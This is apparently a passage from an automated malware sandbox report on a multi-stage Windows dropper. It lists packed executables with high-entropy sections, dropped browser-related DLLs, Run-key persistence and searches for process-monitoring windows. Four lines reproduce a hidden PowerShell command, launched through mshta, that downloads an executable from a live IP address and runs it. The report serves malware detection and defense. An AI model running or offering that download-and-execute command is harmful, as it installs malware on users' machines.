Source: TempBUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE.30.dr	Static PE information: real checksum: 0x2e848b should be: 0x2e6730
Source: random[1].exe2.11.dr	Static PE information: real checksum: 0x1c708b should be: 0x1cdf47

Source: random.exe	Static PE information: section name:
Source: random.exe	Static PE information: section name: .idata
Source: random.exe	Static PE information: section name:
Source: random.exe	Static PE information: section name: xnqbglnd
Source: random.exe	Static PE information: section name: rbssnbal
Source: random.exe	Static PE information: section name: .taggant
Source: AGDDD2MYZL6KQO94XW.exe.0.dr	Static PE information: section name:
Source: AGDDD2MYZL6KQO94XW.exe.0.dr	Static PE information: section name: .idata
Source: AGDDD2MYZL6KQO94XW.exe.0.dr	Static PE information: section name:
Source: AGDDD2MYZL6KQO94XW.exe.0.dr	Static PE information: section name: crzarjak
Source: AGDDD2MYZL6KQO94XW.exe.0.dr	Static PE information: section name: flqcehaa
Source: AGDDD2MYZL6KQO94XW.exe.0.dr	Static PE information: section name: .taggant
Source: HYCURX00F7L1ZQ3FYN.exe.0.dr	Static PE information: section name:
Source: HYCURX00F7L1ZQ3FYN.exe.0.dr	Static PE information: section name: .idata
Source: HYCURX00F7L1ZQ3FYN.exe.0.dr	Static PE information: section name: mqertzmi
Source: HYCURX00F7L1ZQ3FYN.exe.0.dr	Static PE information: section name: jvsnxutt
Source: HYCURX00F7L1ZQ3FYN.exe.0.dr	Static PE information: section name: .taggant
Source: freebl3.dll.2.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.2.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.2.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.2.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.2.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.2.dr	Static PE information: section name: .didat
Source: nss3.dll.2.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.2.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.2.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.2.dr	Static PE information: section name: .00cfg
Source: skotes.exe.3.dr	Static PE information: section name:
Source: skotes.exe.3.dr	Static PE information: section name: .idata
Source: skotes.exe.3.dr	Static PE information: section name: mqertzmi
Source: skotes.exe.3.dr	Static PE information: section name: jvsnxutt
Source: skotes.exe.3.dr	Static PE information: section name: .taggant
Source: random[2].exe.11.dr	Static PE information: section name:
Source: random[2].exe.11.dr	Static PE information: section name: .idata
Source: random[2].exe.11.dr	Static PE information: section name:
Source: random[2].exe.11.dr	Static PE information: section name: vhxwdqgr
Source: random[2].exe.11.dr	Static PE information: section name: xzvouqcl
Source: random[2].exe.11.dr	Static PE information: section name: .taggant
Source: fee976e9bb.exe.11.dr	Static PE information: section name:
Source: fee976e9bb.exe.11.dr	Static PE information: section name: .idata
Source: fee976e9bb.exe.11.dr	Static PE information: section name:
Source: fee976e9bb.exe.11.dr	Static PE information: section name: vhxwdqgr
Source: fee976e9bb.exe.11.dr	Static PE information: section name: xzvouqcl
Source: fee976e9bb.exe.11.dr	Static PE information: section name: .taggant
Source: random[3].exe.11.dr	Static PE information: section name:
Source: random[3].exe.11.dr	Static PE information: section name: .idata
Source: random[3].exe.11.dr	Static PE information: section name:
Source: random[3].exe.11.dr	Static PE information: section name: mzomafvq
Source: random[3].exe.11.dr	Static PE information: section name: rxmgvynz
Source: random[3].exe.11.dr	Static PE information: section name: .taggant
Source: f64eac2185.exe.11.dr	Static PE information: section name:
Source: f64eac2185.exe.11.dr	Static PE information: section name: .idata
Source: f64eac2185.exe.11.dr	Static PE information: section name:
Source: f64eac2185.exe.11.dr	Static PE information: section name: mzomafvq
Source: f64eac2185.exe.11.dr	Static PE information: section name: rxmgvynz
Source: f64eac2185.exe.11.dr	Static PE information: section name: .taggant
Source: random[1].exe.11.dr	Static PE information: section name:
Source: random[1].exe.11.dr	Static PE information: section name: .idata
Source: random[1].exe.11.dr	Static PE information: section name: vfbpzacx
Source: random[1].exe.11.dr	Static PE information: section name: epyoeyfm
Source: random[1].exe.11.dr	Static PE information: section name: .taggant
Source: 5f198671b1.exe.11.dr	Static PE information: section name:
Source: 5f198671b1.exe.11.dr	Static PE information: section name: .idata
Source: 5f198671b1.exe.11.dr	Static PE information: section name: vfbpzacx
Source: 5f198671b1.exe.11.dr	Static PE information: section name: epyoeyfm
Source: 5f198671b1.exe.11.dr	Static PE information: section name: .taggant
Source: random[1].exe0.11.dr	Static PE information: section name:
Source: random[1].exe0.11.dr	Static PE information: section name: .idata
Source: random[1].exe0.11.dr	Static PE information: section name:
Source: random[1].exe0.11.dr	Static PE information: section name: fihicggg
Source: random[1].exe0.11.dr	Static PE information: section name: ymizzuio
Source: random[1].exe0.11.dr	Static PE information: section name: .taggant
Source: 1cfdc82c16.exe.11.dr	Static PE information: section name:
Source: 1cfdc82c16.exe.11.dr	Static PE information: section name: .idata
Source: 1cfdc82c16.exe.11.dr	Static PE information: section name:
Source: 1cfdc82c16.exe.11.dr	Static PE information: section name: fihicggg
Source: 1cfdc82c16.exe.11.dr	Static PE information: section name: ymizzuio
Source: 1cfdc82c16.exe.11.dr	Static PE information: section name: .taggant
Source: random[4].exe.11.dr	Static PE information: section name: .textbss
Source: random[4].exe.11.dr	Static PE information: section name: .msvcjmc
Source: random[4].exe.11.dr	Static PE information: section name: .fptable
Source: random[1].exe1.11.dr	Static PE information: section name:
Source: random[1].exe1.11.dr	Static PE information: section name: .idata
Source: random[1].exe1.11.dr	Static PE information: section name:
Source: random[1].exe1.11.dr	Static PE information: section name: efrqcofg
Source: random[1].exe1.11.dr	Static PE information: section name: yqrfybbc
Source: random[1].exe1.11.dr	Static PE information: section name: .taggant
Source: 275588fe9c.exe.11.dr	Static PE information: section name:
Source: 275588fe9c.exe.11.dr	Static PE information: section name: .idata
Source: 275588fe9c.exe.11.dr	Static PE information: section name:
Source: 275588fe9c.exe.11.dr	Static PE information: section name: efrqcofg
Source: 275588fe9c.exe.11.dr	Static PE information: section name: yqrfybbc
Source: 275588fe9c.exe.11.dr	Static PE information: section name: .taggant
Source: random[1].exe2.11.dr	Static PE information: section name:
Source: random[1].exe2.11.dr	Static PE information: section name: .idata
Source: random[1].exe2.11.dr	Static PE information: section name:
Source: random[1].exe2.11.dr	Static PE information: section name: hyfxsejb
Source: random[1].exe2.11.dr	Static PE information: section name: dmolwlsw
Source: random[1].exe2.11.dr	Static PE information: section name: .taggant
Source: 0436fcd702.exe.11.dr	Static PE information: section name:
Source: 0436fcd702.exe.11.dr	Static PE information: section name: .idata
Source: 0436fcd702.exe.11.dr	Static PE information: section name:
Source: 0436fcd702.exe.11.dr	Static PE information: section name: hyfxsejb
Source: 0436fcd702.exe.11.dr	Static PE information: section name: dmolwlsw
Source: 0436fcd702.exe.11.dr	Static PE information: section name: .taggant
Source: random[2].exe0.11.dr	Static PE information: section name:
Source: random[2].exe0.11.dr	Static PE information: section name: .idata
Source: random[2].exe0.11.dr	Static PE information: section name:
Source: random[2].exe0.11.dr	Static PE information: section name: crzarjak
Source: random[2].exe0.11.dr	Static PE information: section name: flqcehaa
Source: random[2].exe0.11.dr	Static PE information: section name: .taggant
Source: 48b7eec64e.exe.11.dr	Static PE information: section name:
Source: 48b7eec64e.exe.11.dr	Static PE information: section name: .idata
Source: 48b7eec64e.exe.11.dr	Static PE information: section name:
Source: 48b7eec64e.exe.11.dr	Static PE information: section name: crzarjak
Source: 48b7eec64e.exe.11.dr	Static PE information: section name: flqcehaa
Source: 48b7eec64e.exe.11.dr	Static PE information: section name: .taggant
Source: 51c549c9c2.exe.11.dr	Static PE information: section name: .textbss
Source: 51c549c9c2.exe.11.dr	Static PE information: section name: .msvcjmc
Source: 51c549c9c2.exe.11.dr	Static PE information: section name: .fptable
Source: random[3].exe0.11.dr	Static PE information: section name:
Source: random[3].exe0.11.dr	Static PE information: section name: .idata
Source: random[3].exe0.11.dr	Static PE information: section name:
Source: random[3].exe0.11.dr	Static PE information: section name: kcpsgwpt
Source: random[3].exe0.11.dr	Static PE information: section name: qartrjnp
Source: random[3].exe0.11.dr	Static PE information: section name: .taggant
Source: 071b4af2c1.exe.11.dr	Static PE information: section name:
Source: 071b4af2c1.exe.11.dr	Static PE information: section name: .idata
Source: 071b4af2c1.exe.11.dr	Static PE information: section name:
Source: 071b4af2c1.exe.11.dr	Static PE information: section name: kcpsgwpt
Source: 071b4af2c1.exe.11.dr	Static PE information: section name: qartrjnp
Source: 071b4af2c1.exe.11.dr	Static PE information: section name: .taggant
Source: tmpE345.tmp.14.dr	Static PE information: section name:
Source: tmpE345.tmp.14.dr	Static PE information: section name: .idata
Source: tmpE345.tmp.14.dr	Static PE information: section name:
Source: tmpE345.tmp.14.dr	Static PE information: section name: xnqbglnd
Source: tmpE345.tmp.14.dr	Static PE information: section name: rbssnbal
Source: tmpE345.tmp.14.dr	Static PE information: section name: .taggant
Source: NEGM0426B51QOF76X3GO8.exe.16.dr	Static PE information: section name:
Source: NEGM0426B51QOF76X3GO8.exe.16.dr	Static PE information: section name: .idata
Source: NEGM0426B51QOF76X3GO8.exe.16.dr	Static PE information: section name:
Source: NEGM0426B51QOF76X3GO8.exe.16.dr	Static PE information: section name: crzarjak
Source: NEGM0426B51QOF76X3GO8.exe.16.dr	Static PE information: section name: flqcehaa
Source: NEGM0426B51QOF76X3GO8.exe.16.dr	Static PE information: section name: .taggant
Source: N9RHN6UAFCLUOOV6DH7.exe.16.dr	Static PE information: section name:
Source: N9RHN6UAFCLUOOV6DH7.exe.16.dr	Static PE information: section name: .idata
Source: N9RHN6UAFCLUOOV6DH7.exe.16.dr	Static PE information: section name: mqertzmi
Source: N9RHN6UAFCLUOOV6DH7.exe.16.dr	Static PE information: section name: jvsnxutt
Source: N9RHN6UAFCLUOOV6DH7.exe.16.dr	Static PE information: section name: .taggant
Source: TempBUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE.30.dr	Static PE information: section name:
Source: TempBUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE.30.dr	Static PE information: section name: .idata
Source: TempBUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE.30.dr	Static PE information: section name: mqertzmi
Source: TempBUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE.30.dr	Static PE information: section name: jvsnxutt
Source: TempBUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE.30.dr	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_00EDC4C4 pushfd ; retf	0_3_00EDC4CF
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_00EDB918 pushfd ; retf	0_3_00EDB923
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Code function: 3_2_00CDD91C push ecx; ret	3_2_00CDD92F
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Code function: 3_2_00CD1359 push es; ret	3_2_00CD135A

Source: random.exe	Static PE information: section name: entropy: 7.981976765130176
Source: random.exe	Static PE information: section name: xnqbglnd entropy: 7.955041895221839
Source: AGDDD2MYZL6KQO94XW.exe.0.dr	Static PE information: section name: crzarjak entropy: 7.953702142090833
Source: HYCURX00F7L1ZQ3FYN.exe.0.dr	Static PE information: section name: entropy: 7.986747055430897
Source: skotes.exe.3.dr	Static PE information: section name: entropy: 7.986747055430897
Source: random[2].exe.11.dr	Static PE information: section name: vhxwdqgr entropy: 7.947927532921086
Source: fee976e9bb.exe.11.dr	Static PE information: section name: vhxwdqgr entropy: 7.947927532921086
Source: random[3].exe.11.dr	Static PE information: section name: entropy: 7.971954723173139
Source: random[3].exe.11.dr	Static PE information: section name: mzomafvq entropy: 7.954155998647114
Source: f64eac2185.exe.11.dr	Static PE information: section name: entropy: 7.971954723173139
Source: f64eac2185.exe.11.dr	Static PE information: section name: mzomafvq entropy: 7.954155998647114
Source: random[1].exe0.11.dr	Static PE information: section name: entropy: 7.980630852677709
Source: random[1].exe0.11.dr	Static PE information: section name: fihicggg entropy: 7.953740457798493
Source: 1cfdc82c16.exe.11.dr	Static PE information: section name: entropy: 7.980630852677709
Source: 1cfdc82c16.exe.11.dr	Static PE information: section name: fihicggg entropy: 7.953740457798493
Source: random[1].exe1.11.dr	Static PE information: section name: entropy: 7.966652808119376
Source: random[1].exe1.11.dr	Static PE information: section name: efrqcofg entropy: 7.9532683612246755
Source: 275588fe9c.exe.11.dr	Static PE information: section name: entropy: 7.966652808119376
Source: 275588fe9c.exe.11.dr	Static PE information: section name: efrqcofg entropy: 7.9532683612246755
Source: random[1].exe2.11.dr	Static PE information: section name: entropy: 7.977658968302794
Source: random[1].exe2.11.dr	Static PE information: section name: hyfxsejb entropy: 7.9524527755541605
Source: 0436fcd702.exe.11.dr	Static PE information: section name: entropy: 7.977658968302794
Source: 0436fcd702.exe.11.dr	Static PE information: section name: hyfxsejb entropy: 7.9524527755541605
Source: random[2].exe0.11.dr	Static PE information: section name: crzarjak entropy: 7.953702142090833
Source: 48b7eec64e.exe.11.dr	Static PE information: section name: crzarjak entropy: 7.953702142090833
Source: random[3].exe0.11.dr	Static PE information: section name: entropy: 7.979221724965021
Source: random[3].exe0.11.dr	Static PE information: section name: kcpsgwpt entropy: 7.953760392994842
Source: 071b4af2c1.exe.11.dr	Static PE information: section name: entropy: 7.979221724965021
Source: 071b4af2c1.exe.11.dr	Static PE information: section name: kcpsgwpt entropy: 7.953760392994842
Source: tmpE345.tmp.14.dr	Static PE information: section name: entropy: 7.981976765130176
Source: tmpE345.tmp.14.dr	Static PE information: section name: xnqbglnd entropy: 7.955041895221839
Source: NEGM0426B51QOF76X3GO8.exe.16.dr	Static PE information: section name: crzarjak entropy: 7.953702142090833
Source: N9RHN6UAFCLUOOV6DH7.exe.16.dr	Static PE information: section name: entropy: 7.986747055430897
Source: TempBUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE.30.dr	Static PE information: section name: entropy: 7.986747055430897

Persistence and Installation Behavior

Tries to download and execute files (via powershell)

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1062354001\ec93a94e48.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1062359001\51c549c9c2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Jump to dropped file
Source: C:\Users\user\Desktop\random.exe	File created: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1062356001\071b4af2c1.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	File created: C:\Users\user\AppData\Local\Temp\tmpE345.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1062357001\fee976e9bb.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[4].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[3].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File created: C:\Users\user\AppData\Local\Temp\N9RHN6UAFCLUOOV6DH7.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\TempBUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe	Jump to dropped file
Source: C:\Users\user\Desktop\random.exe	File created: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File created: C:\Users\user\AppData\Local\Temp\NEGM0426B51QOF76X3GO8.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0436fcd702.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run f8fdf848d8.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 48b7eec64e.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ec93a94e48.exe	Jump to behavior

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\random.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Window searched: window name: FilemonClass
